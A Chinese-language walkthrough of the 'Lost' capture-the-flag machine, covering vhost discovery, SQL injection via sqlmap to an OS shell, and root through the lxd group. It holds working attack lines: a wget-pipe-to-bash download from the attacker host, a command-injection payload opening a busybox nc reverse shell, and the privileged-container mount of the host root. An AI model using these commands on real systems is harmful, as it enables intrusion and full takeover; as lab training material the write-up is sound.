# 靶场搭建
下载:Lost
Nat,IP: 192.168.1.174
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 65:bb:ae:ef:71:d4:b5:c5:8f:e7:ee:dc:0b:27:46:c2 (ECDSA) | |
|_ 256 ea:c8:da:c8:92:71:d8:8e:08:47:c0:66:e0:57:46:49 (ED25519) | |
80/tcp open http Apache httpd 2.4.57 ((Debian)) | |
|_http-title: lost.nyx | |
|_http-server-header: Apache/2.4.57 (Debian) |
80 口提示域名爆破
┌──(root㉿kali)-[~] | |
└─# gobuster vhost -u lost.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain | |
=============================================================== | |
Gobuster v3.6 | |
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) | |
=============================================================== | |
[+] Url: http://lost.nyx | |
[+] Method: GET | |
[+] Threads: 10 | |
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | |
[+] User Agent: gobuster/3.6 | |
[+] Timeout: 10s | |
[+] Append Domain: true | |
=============================================================== | |
Starting gobuster in VHOST enumeration mode | |
=============================================================== | |
Found: dev.lost.nyx Status: 200 [Size: 9936] | |
Progress: 114441 / 114442 (100.00%) | |
=============================================================== | |
Finished | |
=============================================================== |
添加到 host,看一眼 dev.lost.nyx
翻一下,直接拿下: sqlmap -u http://dev.lost.nyx/passengers.php?id=1 --os-shell --batch
shel 弹出来
os-shell> wget -O - http://192.168.1.129:8000/shell.sh|bash | |
do you want to retrieve the command standard output? [Y/n/a] Y | |
No output |
# 提权
pe -ef 发现有个用户开了个 3000 的 web 服务,需要穿透传出来,我直接在服务器上搞
curl 'http://127.0.0.1:3000/' -X POST --data-raw 'ip=127.0.0.1'
看到 ping 的数据,尝试 RCE: curl 'http://127.0.0.1:3000/' -X POST --data-raw 'ip=127.0.0.1|id' 发现 jackshephard
弹出来 shell: curl 'http://127.0.0.1:3000/' -X POST --data-raw 'ip=127.0.0.1|busybox${IFS}nc${IFS}192.168.1.129${IFS}4444${IFS}-e${IFS}bash'
拿到权限
id 发现存在 lxd 组,那么可以利用
如果我们的用户有 lxd 组,我们可以部署容器(一台机器)以 root 身份升级权限,这样我们就可以将当前操作系统的整个根目录 “/”(主机)挂载→ /mnt/root(容器)。然后,一旦创建,我们将拥有对所有文件的 root 访问权限,这些文件,文件夹 / 以前我们无法读取 / 创建 / 修改。
# 攻击机进行 | |
wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine | |
sudo bash build-alpine | |
# 受害机进行 | |
1. lxc image import 生成的tar.gz --alias alpine # importamos la imagen | |
2. lxc image list # listamos la imagen para ver que se haya creado | |
3. lxc init alpine privesc -c security.privileged=true | |
4. lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true # ponemos que la / raiz este en /mnt/root | |
5. lxc start privesc | |
6. lxc exec privesc sh |
拿到权限
